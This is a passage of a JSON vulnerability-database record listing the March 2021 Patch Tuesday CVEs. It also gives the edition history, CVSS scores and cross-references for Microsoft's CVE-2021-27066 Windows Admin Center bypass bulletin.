\n[CVE-2021-26887](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-26887>) | Microsoft Windows Folder Redirection Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n \n## Summary Graphs\n\n", "published": "2021-03-09T22:13:03", "modified": "2021-03-09T22:13:03", "cvss": {"score": 8.3, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:C"}, "href": "https://blog.rapid7.com/2021/03/09/patch-tuesday-march-2021/", "reporter": "Adam Bunn", "references": [], "cvelist": ["CVE-2020-27844", "CVE-2021-1640", "CVE-2021-1729", "CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21164", "CVE-2021-21165", "CVE-2021-21166", "CVE-2021-21167", "CVE-2021-21168", "CVE-2021-21169", "CVE-2021-21170", "CVE-2021-21171", "CVE-2021-21172", "CVE-2021-21173", "CVE-2021-21174", "CVE-2021-21175", "CVE-2021-21176", "CVE-2021-21177", "CVE-2021-21178", "CVE-2021-21179", "CVE-2021-21180", "CVE-2021-21181", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21184", "CVE-2021-21185", "CVE-2021-21186", "CVE-2021-21187", "CVE-2021-21188", "CVE-2021-21189", "CVE-2021-21190", "CVE-2021-21300", "CVE-2021-24089", "CVE-2021-24090", "CVE-2021-24095", "CVE-2021-24104", "CVE-2021-24107", "CVE-2021-24108", "CVE-2021-24110", "CVE-2021-26411", "CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-26859", "CVE-2021-26860", "CVE-2021-26861", "CVE-2021-26862", "CVE-2021-26863", "CVE-2021-26864", "CVE-2021-26865", "CVE-2021-26866", "CVE-2021-26867", "CVE-2021-26868", "CVE-2021-26869", "CVE-2021-26870", "CVE-2021-26871", "CVE-2021-26872", "CVE-2021-26873", "CVE-2021-26874", "CVE-2021-26875", "CVE-2021-26876", "CVE-2021-26877", "CVE-2021-26878", "CVE-2021-26879", "CVE-2021-26880", "CVE-2021-26881", "CVE-2021-26882", "CVE-2021-26884", "CVE-2021-26885", "CVE-2021-26886", "CVE-2021-26887", "CVE-2021-26889", "CVE-2021-26890", "CVE-2021-26891", "CVE-2021-26892", "CVE-2021-26893", "CVE-2021-26894", "CVE-2021-26895", "CVE-2021-26896", "CVE-2021-26897", "CVE-2021-26898", "CVE-2021-26899", "CVE-2021-26900", "CVE-2021-26901", "CVE-2021-26902", "CVE-2021-27047", "CVE-2021-27048", "CVE-2021-27049", "CVE-2021-27050", "CVE-2021-27051", "CVE-2021-27052", "CVE-2021-27053", "CVE-2021-27054", "CVE-2021-27055", "CVE-2021-27056", "CVE-2021-27057", "CVE-2021-27058", "CVE-2021-27059", "CVE-2021-27060", "CVE-2021-27061", "CVE-2021-27062", "CVE-2021-27063", "CVE-2021-27065", "CVE-2021-27066", "CVE-2021-27070", "CVE-2021-27074", "CVE-2021-27075", "CVE-2021-27076", "CVE-2021-27077", "CVE-2021-27078", "CVE-2021-27080", "CVE-2021-27081", "CVE-2021-27082", "CVE-2021-27083", "CVE-2021-27084", "CVE-2021-27085"], "lastseen": "2021-03-09T22:49:55", "history": [], "viewCount": 38, "enchantments": {"dependencies": {"references": [{"type": "nessus", "idList": ["SMB_NT_MS21_MAR_5000822.NASL", "FREEBSD_PKG_F00B65D87CCB11EBB3BEE09467587C17.NASL", "SMB_NT_MS21_MAR_5000809.NASL", "SMB_NT_MS21_MAR_5000803.NASL", "SMB_NT_MS21_MAR_5000802.NASL", "SMB_NT_MS21_MAR_5000847.NASL", "GOOGLE_CHROME_89_0_4389_72.NASL", "SMB_NT_MS21_MAR_5000808.NASL", "MICROSOFT_EDGE_CHROMIUM_89_0_774_45.NASL", "MACOSX_GOOGLE_CHROME_89_0_4389_72.NASL"]}, {"type": "freebsd", "idList": ["F00B65D8-7CCB-11EB-B3BE-E09467587C17"]}, {"type": "attackerkb", "idList": ["AKB:5D17BB38-86BB-4514-BF1D-39EB48FBE4F1", "AKB:8E9F0DC4-BC72-4340-B70E-5680CA968D2B", "AKB:AC6EF4EB-7075-41DD-BE7A-00DEA8B5BA3F", "AKB:BD645B28-C99E-42EA-A606-832F4F534945", "AKB:1BA7DC74-F17D-4C34-9A6C-2F6B39787AA2"]}, {"type": "threatpost", "idList": ["THREATPOST:CAA77BB0CF0093962ECDD09004546CA3", "THREATPOST:DC270F423257A4E0C44191BE365F25CB", "THREATPOST:54430D004FBAE464FB7480BC724DBCC8", "THREATPOST:247CA39D4B32438A13F266F3A1DED10E", "THREATPOST:056C552B840B2C102A6A75A2087CA8A5", "THREATPOST:A8D4979B3A84B8E7B98B5321FA948454"]}, {"type": "thn", "idList": ["THN:BC8A83422D35DB5610358702FCB4D154", "THN:9DB02C3E080318D681A9B33C2EFA8B73", "THN:9AB21B61AFE09D4EEF533179D0907C03"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:479A14480548534CBF2C80AFA3FFC840"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:6C0062981975551A3565CCAD248A1573"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:07CCE98B638067D2F0F9AD53E87E8D55", "MALWAREBYTES:B4D157FAC0EB655355514D120382CC56"]}, {"type": "cve", "idList": ["CVE-2021-27058", "CVE-2021-27055", "CVE-2021-27056", "CVE-2021-27052", "CVE-2021-27050", "CVE-2021-24090", "CVE-2021-27051", "CVE-2021-24110", "CVE-2021-26859", "CVE-2021-27066"]}, {"type": "securelist", "idList": ["SECURELIST:403B2D76CFDBDAB0862F6860A95E54B4"]}, {"type": "mssecure", "idList": ["MSSECURE:28641FE2F73292EB4B26994613CC882B"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:C9B38F7962606C41AA16ECBD4E48D712"]}, {"type": "krebs", "idList": ["KREBS:65D25A653F7348C7F18FFD951447B275"]}, {"type": "cisa", "idList": ["CISA:16DE226AFC5A22020B20927D63742D98"]}, {"type": "fireeye", "idList": ["FIREEYE:C650A7016EEAD895903FB350719E53E3"]}, {"type": "talosblog", "idList": ["TALOSBLOG:AC8ED8970F5692A325A10D93B7F0D965"]}, {"type": "mmpc", "idList": ["MMPC:28641FE2F73292EB4B26994613CC882B"]}], "modified": "2021-03-09T22:49:55", "rev": 2}, "score": {"value": 5.7, "vector": "NONE", "modified": "2021-03-09T22:49:55", "rev": 2}}, "objectVersion": "1.4"}, "lastseen": "2021-03-09T22:49:55", "differentElements": ["cvss"], "edition": 1}], "viewCount": 72, "enchantments": {"dependencies": {"references": [{"type": "metasploit", "idList": ["MSF:ILITIES/FREEBSD-CVE-2021-21159/"]}, {"type": "kaspersky", "idList": ["KLA12106", "KLA12111", "KLA12110", "KLA12103", "KLA12107", "KLA12112", "KLA12123", "KLA12109"]}, {"type": "nessus", "idList": ["GOOGLE_CHROME_89_0_4389_72.NASL", "SMB_NT_MS21_MAR_5000808.NASL", "FEDORA_2021-C88A96BD4B.NASL", "MICROSOFT_EDGE_CHROMIUM_89_0_774_45.NASL", "FREEBSD_PKG_F00B65D87CCB11EBB3BEE09467587C17.NASL", "SMB_NT_MS21_MAR_HEVC.NASL", "SMB_NT_MS21_MAR_5000802.NASL", "FEDORA_2021-4740239E28.NASL", "DEBIAN_DSA-4886.NASL", "SMB_NT_MS21_MAR_5000809.NASL", "OPENSUSE-2021-392.NASL", "SMB_NT_MS21_MAR_5000841.NASL", "SMB_NT_MS21_MAR_5000847.NASL", "SMB_NT_MS21_MAR_5000803.NASL", "SMB_NT_MS21_MAR_5000807.NASL", "MACOSX_GOOGLE_CHROME_89_0_4389_72.NASL", "SMB_NT_MS21_MAR_EXCHANGE_OOB.NASL", "SMB_NT_MS21_MAR_5000848.NASL", "SMB_NT_MS21_MAR_5000844.NASL", "SMB_NT_MS21_MAR_5000822.NASL", "SMB_NT_MS21_MAR_OFFICE.NASL"]}, {"type": "freebsd", "idList": ["F00B65D8-7CCB-11EB-B3BE-E09467587C17"]}, {"type": "fedora", "idList": ["FEDORA:C67773052A4D", "FEDORA:BF4FC30A0346", "FEDORA:A017F3074280"]}, {"type": "attackerkb", "idList": ["AKB:5D17BB38-86BB-4514-BF1D-39EB48FBE4F1", "AKB:4C137002-9580-4593-83DB-D4E636E1AEFB", "AKB:BD645B28-C99E-42EA-A606-832F4F534945", "AKB:AC6EF4EB-7075-41DD-BE7A-00DEA8B5BA3F", "AKB:8E9F0DC4-BC72-4340-B70E-5680CA968D2B", "AKB:9D3FDE28-C33F-4537-BC76-C0F46CFDDA10"]}, {"type": "archlinux", "idList": ["ASA-202103-19"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2021:0392-1", "OPENSUSE-SU-2021:0401-1"]}, {"type": "debian", "idList": ["DEBIAN:DSA-4886-1:0EF07"]}, {"type": "threatpost", "idList": ["THREATPOST:A8D4979B3A84B8E7B98B5321FA948454", "THREATPOST:056C552B840B2C102A6A75A2087CA8A5"]}, {"type": "thn", "idList": ["THN:BC8A83422D35DB5610358702FCB4D154"]}, {"type": "mskb", "idList": ["KB5000871"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:6C0062981975551A3565CCAD248A1573"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:479A14480548534CBF2C80AFA3FFC840"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:07CCE98B638067D2F0F9AD53E87E8D55"]}, {"type": "cve", "idList": ["CVE-2021-27060", "CVE-2021-26900", "CVE-2021-27081", "CVE-2021-27075", "CVE-2021-26889", "CVE-2021-27050", "CVE-2021-26871", "CVE-2021-26885", "CVE-2021-26902", "CVE-2021-27061", "CVE-2021-24089", "CVE-2021-27057", "CVE-2021-27054", "CVE-2021-26887", "CVE-2021-26896", "CVE-2021-24108", "CVE-2021-27047", "CVE-2021-27056", "CVE-2021-27055", "CVE-2021-27070", "CVE-2021-26876", "CVE-2021-26865", "CVE-2021-26866", "CVE-2021-24090", "CVE-2021-27053", "CVE-2021-27063", "CVE-2021-27078", "CVE-2021-27051", "CVE-2021-27085", "CVE-2021-27049", "CVE-2021-27062", "CVE-2021-27048", "CVE-2021-27059", "CVE-2021-26859", "CVE-2021-27052", "CVE-2021-24095", "CVE-2021-27074", "CVE-2021-26864", "CVE-2021-27082", "CVE-2021-27080", "CVE-2021-27058", "CVE-2021-24110", "CVE-2021-26874", "CVE-2021-26860", "CVE-2021-27066", "CVE-2021-26863", "CVE-2021-27083", "CVE-2021-27084"]}], "modified": "2021-03-13T12:49:58", "rev": 2}, "score": {"value": 6.0, "vector": "NONE", "modified": "2021-03-13T12:49:58", "rev": 2}}, "objectVersion": "1.5", "_object_type": "robots.models.rss.RssBulletin", "_object_types": ["robots.models.rss.RssBulletin", "robots.models.base.Bulletin"], "immutableFields": [], "cvss2": {}, "cvss3": {}}], "mscve": [{"id": "MS:CVE-2021-27066", "hash": "f48b224e65ca63a954b1a862163a3fe2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-10-06T10:48:06", "history": [{"bulletin": {"id": "MS:CVE-2021-27066", "hash": "c6e3e907c198903fe0fa57aafa33c391", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "\n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-03-11T23:29:21", "history": [], "viewCount": 0, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-03-11T23:29:21", "rev": 2}, "score": {"value": 5.7, "vector": "NONE", "modified": "2021-03-11T23:29:21", "rev": 2}}, "objectVersion": "1.4", "kbList": ["KBRelease Notes", "KBNone"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"kb": "KBRelease Notes", "kbSupersedence": "KBNone", "msplatform": "", "name": "Windows Admin Center"}], "vendorCvss": {}}, "lastseen": "2021-03-11T23:29:21", "differentElements": ["cvss", "href", "kbList", "msAffectedSoftware"], "edition": 1}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "66708d10b666843ac35d5b305618510f", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "\n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {}, "cvss3": {}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-03-18T19:13:51", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-03-18T19:13:51", "rev": 2}, "score": {"value": 5.7, "vector": "NONE", "modified": "2021-03-18T19:13:51", "rev": 2}}, "objectVersion": "1.5", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-03-18T19:13:51", "differentElements": ["description"], "edition": 2}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3318235d64b4cdd786c56881051782fb", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {}, "cvss3": {}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-05-19T21:15:46", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-05-19T21:15:46", "rev": 2}, "score": {"value": 5.7, "vector": "NONE", "modified": "2021-05-19T21:15:46", "rev": 2}}, "objectVersion": "1.5", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-05-19T21:15:46", "differentElements": ["cvss2", "cvss3"], "edition": 3}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3c029ffeade3d3a98dc989d14961ebb1", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-07-28T20:06:22", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-05-19T21:15:46", "rev": 2}, "score": {"value": 5.7, "vector": "NONE", "modified": "2021-05-19T21:15:46", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-07-28T20:06:22", "differentElements": ["description"], "edition": 4}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "ae165be3481d358dcbfac63a57d67a93", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-07-30T03:25:29", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-05-19T21:15:46", "rev": 2}, "score": {"value": 5.7, "vector": "NONE", "modified": "2021-05-19T21:15:46", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-07-30T03:25:29", "differentElements": ["description"], "edition": 5}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3c029ffeade3d3a98dc989d14961ebb1", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-07-30T06:05:29", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-05-19T21:15:46", "rev": 2}, "score": {"value": 5.7, "vector": "NONE", "modified": "2021-05-19T21:15:46", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-07-30T06:05:29", "differentElements": ["description"], "edition": 6}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "ae165be3481d358dcbfac63a57d67a93", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-07-30T16:45:25", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-05-19T21:15:46", "rev": 2}, "score": {"value": 5.7, "vector": "NONE", "modified": "2021-05-19T21:15:46", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-07-30T16:45:25", "differentElements": ["description"], "edition": 7}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "3c029ffeade3d3a98dc989d14961ebb1", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "Windows Admin Center Security Feature Bypass Vulnerability \n", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-27066", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2021-27066"], "immutableFields": [], "lastseen": "2021-07-30T18:56:45", "history": [], "viewCount": 7, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-27066"]}, {"type": "nessus", "idList": ["WINDOWS_ADMIN_CENTER_MS21_MAR.NASL"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:88A83067D8D3C5AEBAF1B793818EEE53"]}], "modified": "2021-05-19T21:15:46", "rev": 2}, "score": {"value": 5.7, "vector": "NONE", "modified": "2021-05-19T21:15:46", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBRelease Notes"], "msrc": "", "mscve": "CVE-2021-27066", "msAffectedSoftware": [{"name": "Windows Admin Center", "kbSupersedence": "", "kb": "KBRelease Notes", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-07-30T18:56:45", "differentElements": ["description"], "edition": 8}, {"bulletin": {"id": "MS:CVE-2021-27066", "hash": "ae165be3481d358dcbfac63a57d67a93", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows Admin Center Security Feature Bypass Vulnerability", "description": "", "published": "2021-03-09T08:00:00", "modified": "2021-03-09T08:00:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": 